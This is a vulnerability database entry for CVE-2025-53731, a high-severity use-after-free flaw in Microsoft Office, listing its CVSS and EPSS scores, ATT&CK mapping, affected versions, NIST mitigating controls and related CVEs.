Cyber Resilience

CVE-2025-53731

High

Published: 12 August 2025

Published
12 August 2025
Modified
15 August 2025
KEV Added
Patch
CVSS Score v3.1 8.4 CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
EPSS Score 0.0141 80.9th percentile
Risk Priority 18 60% EPSS · 20% KEV · 20% CVSS

Summary

CVE-2025-53731 is a high-severity Use After Free (CWE-416) vulnerability in Microsoft Office Long Term Servicing Channel. Its CVSS base score is 8.4 (High).

Operationally, exploitation aligns with the MITRE ATT&CK technique Exploitation for Client Execution (T1203); ranked in the top 19.1% of CVEs by exploit likelihood; it is not currently listed in the CISA KEV catalog.

The strongest mitigations our analysis identified are NIST 800-53 SI-16 (Memory Protection) and SI-2 (Flaw Remediation).

Deeper analysis

CVE-2025-53731 is a use-after-free vulnerability (CWE-416) in Microsoft Office that carries a CVSS 3.1 score of 8.4. The flaw permits an attacker to execute arbitrary code on an affected system when the vulnerable component processes specially crafted content.

An unauthorized attacker can exploit the issue locally without user interaction or elevated privileges. Successful exploitation grants full control over confidentiality, integrity, and availability on the target host, consistent with the high-impact metrics in the vector string AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H.

The Microsoft Security Response Center advisory at https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-53731 provides official guidance on available patches and mitigation steps for supported Office versions.

The associated EPSS score remains low at 0.0141 with no material increase since publication, indicating limited observed exploitation interest to date.

EU & UK References

Vulnerability details

Use after free in Microsoft Office allows an unauthorized attacker to execute code locally.

CWE(s)

Related Threats

MITRE ATT&CK Enterprise TechniquesAI

T1203 Exploitation for Client Execution Execution
Adversaries may exploit software vulnerabilities in client applications to execute code.
Why these techniques?

Use-after-free in Microsoft Office directly enables arbitrary local code execution without privileges or user interaction, mapping to Exploitation for Client Execution.

Confidence: HIGH · MITRE ATT&CK Enterprise v18.1

CVEs Like This One

CVE-2025-24080Same product: Microsoft 365 Apps
CVE-2025-53740Same product: Microsoft 365 Apps
CVE-2026-20952Same product: Microsoft 365 Apps
CVE-2026-40358Same product: Microsoft 365 Apps
CVE-2025-21392Same product: Microsoft 365 Apps
CVE-2026-40366Same product: Microsoft 365 Apps
CVE-2025-21345Same product: Microsoft 365 Apps
CVE-2025-62557Same product: Microsoft 365 Apps
CVE-2026-40361Same product: Microsoft 365 Apps
CVE-2025-49695Same product: Microsoft 365 Apps

Affected Assets

microsoft
365 apps
all versions
microsoft
office
2016, 2019
microsoft
office long term servicing channel
2021, 2024

Mitigating Controls

Mitigating Controls (NIST 800-53 r5) AI

prevent

Directly requires timely patching and remediation of the use-after-free vulnerability in Microsoft Office to eliminate the flaw.

prevent

Implements memory protection mechanisms such as ASLR and DEP that specifically mitigate use-after-free exploitation attempts.

preventdetect

Deploys malicious code protection at entry points to block or detect malicious Office documents exploiting the use-after-free vulnerability.

References